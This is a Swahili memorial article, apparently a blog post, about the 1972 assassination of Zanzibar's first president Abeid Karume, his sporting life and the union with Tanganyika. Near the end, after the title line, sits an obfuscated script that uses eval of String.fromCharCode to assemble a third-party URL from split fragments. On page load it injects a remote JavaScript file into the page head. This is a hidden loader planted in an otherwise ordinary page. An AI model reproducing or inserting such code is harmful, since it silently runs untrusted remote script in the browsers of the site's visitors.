Leo ni Kumbukizi ya kifo Cha Aliyekuwa Raisi wa kwanza wa serikali ya mapinduzi ya Zanzibar Hayati Abein Amani Karume ambaye ametimiza takribani miaka 50 tangu kupoteza maisha yake kwa kuuwawa kwa kupigwa risasi tarehe 7 Aprili, 1972.
Watu huwa wanasema kuwa unachokipenda ndicho kitakacho kumaliza. Hayati Karume alikuwa anapenda sana michezo ambapo alipigwa risasi wakati akicheza mchezo wa bao na wenzake, ambapo aliyemuua naye aliuawa papo hapo na walinzi wa Karume, baada ya kutokea kwa tukio hilo.
Ngoja nikupe mwangaza kumhusu Karume. Alizaliwa mwaka 1905, hivyo hadi umauti unamfika alikuwa na umri wa miaka takriban 67, huku umauti huo ukimfika akiwa katika eneo la michezo ambalo ni sehemu ya kucheza bao.
Wataalamu wa michezo wanaeleza mchezo wa bao ni miongoni mwa michezo inayotumia akili nyingi, katika kupata ushindi dhidi ya mpinzani wako, ikilinganishwa na michezo mingine
Tunaweza kusema moja kwa moja ni mwanamichezo aliyepoteza maisha wakati wa michezo kitu ambacho ndicho kilikuwa kipenzi chake katika kupumzisha akili yake baada ya majukumu yake ya kuleta maendeleo ya nchi kwa ujumla.
Mbali na siasa ambayo watu wengi ndiyo wanamfahamu, lakini alikuwa ni mwanamichezo mahiri akishiriki katika kucheza na kuchangia katika shunguli za michezo ambazo zimekuwa zikichangia kuwapa ajira vijana.
Historia zinamtaja Karume kuwa, kabla ya kujikita katika harakati za siasa alifanya kazi ya Ubahari iliyomwezesha kuzunguka nchi nyingi duniani.
Inaelezwa katika kipindi hicho cha ujana wake, alianzisha timu ya mpira wa miguu iliyofahamika African Sport ya visiwani Zanzibar, huku mwenyewe alikuwa Mchezaji wa timu hiyo.
Serikali za kikoloni zilikuwa zinaruhusu vyama vya kijamii na michezo na kupinga uanzishwaji wa vyama vya siasa.
Inaelezwa katika mikusanyiko ya kimichezo walitumia mwanya huo katika kujadili jinsi ya kujikomboa kutoka katika makucha ya wakoloni.
Licha ya hayo machache Kubwa zaidi ni lile lisilo la kimichezo ambalo limebaki kama alama duniani hadi sasa ni kufanya Muungano wa nchi yake na Tanganyika kuunda Tanzania, kwa hili linafanya akumbukwe kwa muda mrefu na watanzania. Eeeh Mungu mlaze mahali pema peponi Hayati Karume.
Karume Mwamba Usiofutika Kwenye Nyoyo za Watanzania
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Recent Comments